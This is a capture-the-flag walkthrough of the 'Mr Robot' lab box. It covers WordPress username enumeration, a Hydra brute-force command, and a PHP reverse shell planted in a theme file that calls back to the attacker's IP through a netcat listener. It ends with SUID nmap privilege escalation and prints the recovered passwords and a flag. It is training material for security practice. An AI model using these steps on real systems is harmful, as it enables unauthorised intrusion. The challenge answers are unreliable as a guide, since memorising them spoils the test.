
walkthrough: { type: “ctf”, name: “Mr Robot” }

This is a copy of the short write-up of the capture the flag (CTF) challenge “Mr Robot” that I originally posted to LinkedIn, covering the steps I took to gain all three flags. This is still one of the more popular CTF challenges, and it was quite fun to get into.

We’ll start the challenge with a bit of enumeration; the first step is an nmap scan of the host.


The first thing we observe is that two services are hosted, on ports 80 and 443 respectively. Based on the port numbers these should be HTTP and HTTPS. Let’s open both services in the browser to see whether they display the same content.

Repeating this on the HTTPS port shows the same page, served using a self-signed certificate.

The website appears to be some form of web terminal and displays some commands that you can execute. Let’s test them sequentially, starting with prepare.

It appears this just loads a short video about FSociety. The same happens with the other menu options. Moving on, let’s do a bit of web discovery. I always like to start by checking robots.txt, as there are sometimes hidden gems in it.

Hmmm, let’s try to grab the files referenced in the last two lines of the robots file.

# -O saves the file under its remote name (fsocity.dic); it takes no argument of its own
curl -O http://10.10.77.225/fsocity.dic

Taking a quick look at the contents, it appears to be a password dump. Let’s save this for later.

Looking at the second file, we have our first flag!

Now it’s time to figure out what else is on this web server. For this we use a tool called gobuster.

After letting gobuster run for a short while, we observe a couple of directories prefixed with wp-, which indicates that the site is running the well-known CMS WordPress. Time to shift focus and see if we can get to the WordPress backend on /wp-admin.

OK, so access to the admin page is not restricted. Let’s try authenticating with a random username. In the first attempt, I tried the combination user and password.

Notice that the error warns us of an invalid username. We might be able to leverage this to brute-force WordPress and identify a valid username. We’re going to use Burp Suite for this; I won’t go into detail on how to set up the connection between the browser and Burp. After configuring Burp to intercept the browser’s traffic, I tried sending user/user as the credentials to the WP login page. Grabbing the request in HTTP History, we then send it to Intruder (CTRL+I).

We’ll load the fsocity.dic list into the payload options and set the payload position to override the request’s username, hoping to identify a username that’s valid.

Now, after starting the attack, we notice one payload returns a different length, so the response must be slightly different from the others. Let’s take a closer look.

Most of the responses have a length of 4061 and contain “Invalid username” in the body. However, one has a slightly different length, 4112, and shows a different error in the response, specifically that the password is wrong. This tells us there is a login called “Elliot” on this WordPress instance.
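What the Intruder results show by eye is that the login form answers differently for an existing user and a non-existing one. The following is an added example (not part of the original write-up) that performs the same comparison on a set of constructed, Intruder-style results: it flags the response whose length differs from the baseline and groups payloads by the error text they received. The response bodies and lengths are constructed to imitate WordPress’s two error messages; nothing here is captured from the box. The same check is useful from the other side of the fence, to confirm that your own login form does not leak which usernames exist.

```python
import re
from collections import Counter

# Constructed sample of Burp Intruder-style results as (payload, status, length, body).
# Not captured from the CTF box; the bodies imitate WordPress's two login-error texts.
SAMPLE_RESULTS = [
    ("admin",  200, 4061, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'),
    ("test",   200, 4061, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'),
    ("Elliot", 200, 4112, '<div id="login_error"><strong>ERROR</strong>: The password you entered '
                          'for the username <strong>Elliot</strong> is incorrect.</div>'),
    ("root",   200, 4061, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'),
]


def extract_error(body):
    """Pull the text of WordPress's login_error box out of an HTML body, tags stripped."""
    m = re.search(r'<div id="login_error">(.*?)</div>', body, re.S)
    return re.sub(r"<[^>]+>", "", m.group(1)).strip() if m else ""


def find_length_outliers(results):
    """Payloads whose response length differs from the most common length
    (the same thing Intruder's Length column shows at a glance)."""
    counts = Counter(length for _, _, length, _ in results)
    baseline = counts.most_common(1)[0][0]
    return [payload for payload, _, length, _ in results if length != baseline]


def errors_by_payload(results):
    """Group payloads by the error message they received, so a differing message stands out."""
    groups = {}
    for payload, _, _, body in results:
        groups.setdefault(extract_error(body), []).append(payload)
    return groups


def leaks_valid_usernames(results):
    """True when the form answers differently for existing and non-existing users."""
    return len(errors_by_payload(results)) > 1


if __name__ == "__main__":
    print("length outliers:", find_length_outliers(SAMPLE_RESULTS))
    for message, payloads in errors_by_payload(SAMPLE_RESULTS).items():
        print(f"{message!r} -> {payloads}")
    print("username enumeration possible:", leaks_valid_usernames(SAMPLE_RESULTS))
```

If the grouping returns more than one message, the form is enumerable. For WordPress the usual fix is to return one generic message for every failure via the login_errors filter, which makes the length and body identical regardless of whether the username exists.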

Right, having identified a possible username, we change our Intruder configuration slightly. We keep fsocity.dic as the data source but apply the payload to the password instead, and statically set the login to Elliot.

After waiting a while, I got bored of watching the Burp Intruder results process so slowly, so I switched tactics and changed my attack to use Hydra. The only difference here was that I deduplicated the fsocity.dic file, as I noticed it contained a ton of duplicates.

sort -u fsocity.dic > fsocity.dic.nodup

# http-post-form needs a third field telling hydra what a failed login looks like;
# WordPress wraps every login error in <div id="login_error">, so F=login_error works for both error texts
hydra -V -l Elliot -P fsocity.dic.nodup 10.10.77.225 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=login_error'

This was a LOT quicker than Burp at getting a result, probably because I didn’t notice the duplicates in fsocity.dic when I ran it through Burp. #facepalm. We now know that Elliot’s password is “ER28-0652”. Let’s test these credentials on /wp-login.php.

We’re in! Time to poke around. Let’s try to get a shell onto the box. The easiest way to do this will be to edit one of the theme’s PHP files, inserting a PHP reverse shell. We’ll edit the shell so it knows to connect back to our AttackBox IP (10.10.9.250).

root@ip-10-10-9-250~# cp /usr/share/webshells/php/php-reverse-shell.php ./
root@ip-10-10-9-250~# sed -i 's/PUT_THM_ATTACKBOX_IP_HERE/10.10.9.250/g' php-reverse-shell.php

Now, copy and paste the contents of the PHP script into one of the .php templates in the theme editor. Something to note: this should NEVER be done on a customer’s live system, as it will cause all sorts of havoc. Start a netcat listener (nc -lvnp PORT) and try to open the 404.php page on the site. If this works, we will get a reverse shell.

Awesome, we’ve got a shell! First, upgrade the shell so it’s easier to interact with (thank you, pty.spawn!), then take a look at the local users’ directory, as there might be something of interest there.

$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$
daemon@linux:/home/robot$ cd /home
cd /home
daemon@linux:/home$ ls -l
ls -l
total 4
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot

daemon@linux:/home/robot$ cd /home/robot
cd /home/robot
daemon@linux:/home/robot$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5

daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

OK, so we found two files: one we can’t open and another that appears to contain a user/password hash combo. Checking if the hash exists on crackstation.net was successful, which saves us the effort of trying to break the password locally. Let’s see if we can su to the user ‘robot’.
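The reason a lookup site answers instantly is that password.raw-md5 holds a plain, unsalted MD5 digest, which is cheap to recompute for every candidate word. The following is an added example, not code from the write-up, showing the local equivalent: it parses the user:hash format found in the file, hashes each wordlist entry once (duplicates are skipped, in the spirit of the sort -u step above), and reports any match. The hash line is a copy of what the box showed; the wordlist is constructed for the example and is not fsocity.dic.

```python
import hashlib

# Copy of the line found in /home/robot/password.raw-md5. The digest is also the well-known
# RFC 1321 test vector for "abcdefghijklmnopqrstuvwxyz", the password the write-up goes on to use.
PASSWORD_RAW_MD5 = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"

# Constructed stand-in for a wordlist such as fsocity.dic (note the deliberate duplicate).
WORDLIST = ["password", "123456", "letmein", "abcdefghijklmnopqrstuvwxyz",
            "qwerty", "abcdefghijklmnopqrstuvwxyz", "ER28-0652"]

HEX_DIGITS = set("0123456789abcdef")


def parse_user_hash_lines(text):
    """Parse 'user:hexmd5' lines into (user, digest) tuples, validating the digest format."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, digest = line.partition(":")
        digest = digest.strip().lower()
        if not sep or len(digest) != 32 or set(digest) - HEX_DIGITS:
            raise ValueError(f"not a raw MD5 entry: {raw!r}")
        entries.append((user.strip(), digest))
    return entries


def crack_raw_md5(entries, wordlist):
    """Return {user: password} for each entry whose unsalted MD5 matches a wordlist candidate.
    Each distinct word is hashed once; the loop stops as soon as every entry is matched."""
    targets = {digest: user for user, digest in entries}
    found, seen = {}, set()
    for word in wordlist:
        if word in seen:
            continue
        seen.add(word)
        digest = hashlib.md5(word.encode("utf-8")).hexdigest()
        user = targets.get(digest)
        if user is not None and user not in found:
            found[user] = word
            if len(found) == len(targets):
                break
    return found


if __name__ == "__main__":
    entries = parse_user_hash_lines(PASSWORD_RAW_MD5)
    print(crack_raw_md5(entries, WORDLIST))
```

Because there is no salt, the same digest will match for every user who chose that password, and an attacker (or a lookup table) never has to hash a word more than once; a salted, slow hash such as bcrypt removes both advantages, which is why a file like this is a finding in its own right.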

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ whoami
whoami
robot
robot@linux:~$ cd ~
cd ~
robot@linux:~$ ls
ls
key-2-of-3.txt	password.raw-md5
robot@linux:~$ cat key*
cat key*
822c73956184f694993bede3eb39f959

Excellent, so we’ve now got the second flag! We’re still not root though, and still do not have the third flag. Let’s look for any binaries that have the SUID bit set.

So, we can see several binaries that have SUID set. However, one stands out pretty quickly: nmap, as it has an interactive mode that might allow us shell access. Let’s give it a try.
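Listing SUID files is as useful for auditing a host as it is for a CTF: the interesting entries are the ones that are not part of the normal set. The following is an added example (not from the write-up) that walks the filesystem the way find / -perm -4000 does and then separates the hits into expected and unexpected binaries. The allowlist is an assumption for the example, a short Debian/Ubuntu-style list rather than an authoritative one; the sample paths used when it runs stand-alone are constructed and not taken from the box.

```python
import os
import stat

# Assumed allowlist of SUID binaries that are normally expected on a Debian/Ubuntu-style host.
# This is an example list for the audit, not a complete or authoritative one.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

# Pseudo-filesystems that are noise for this purpose and slow to walk.
SKIP_DIRS = {"/proc", "/sys", "/dev"}


def is_suid_regular_file(path):
    """True for a regular file (not a symlink) with the SUID bit set."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid_binaries(root="/"):
    """Walk root and return sorted paths of SUID regular files (find / -perm -4000 -type f)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        # prune in place so os.walk does not descend into pseudo-filesystems
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_suid_regular_file(path):
                hits.append(path)
    return sorted(hits)


def unexpected_suid(paths, expected=EXPECTED_SUID):
    """SUID files that are not on the allowlist: the ones worth a second look."""
    return [p for p in paths if os.path.normpath(p) not in expected]


if __name__ == "__main__":
    # Constructed sample standing in for a real scan; nmap is the odd one out here.
    sample = ["/bin/su", "/usr/bin/sudo", "/usr/local/bin/nmap", "/usr/bin/passwd"]
    print("unexpected:", unexpected_suid(sample))
    print("on this host:", unexpected_suid(find_suid_binaries("/usr")))
```

On a real host, anything the allowlist does not explain deserves a look at why it is SUID at all; a network scanner with an interactive mode, as on this box, is a classic example of a binary that should never carry the bit.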

Right, this appears straightforward: let’s try nmap --interactive and see if we can get into /root.

We have successfully gotten root! And the third flag! Woop!

This box is kind of iconic, with its reference to the Mr Robot TV series. I’d been meaning to try it for a while, but had my focus elsewhere. Definitely enjoyable to play with, although not as difficult as it could have been. I’m pretty sure there are other methods of getting a foothold on this CTF, perhaps through one of the WordPress themes or plugins. I might try it again in a few weeks and see if there is another entry point.

I realize this isn’t as short as I mentioned in the first paragraph; I did rabbit-hole a bit poking around the box. Hopefully this article makes sense and is enjoyable to those who decide to read it 🙂

Keith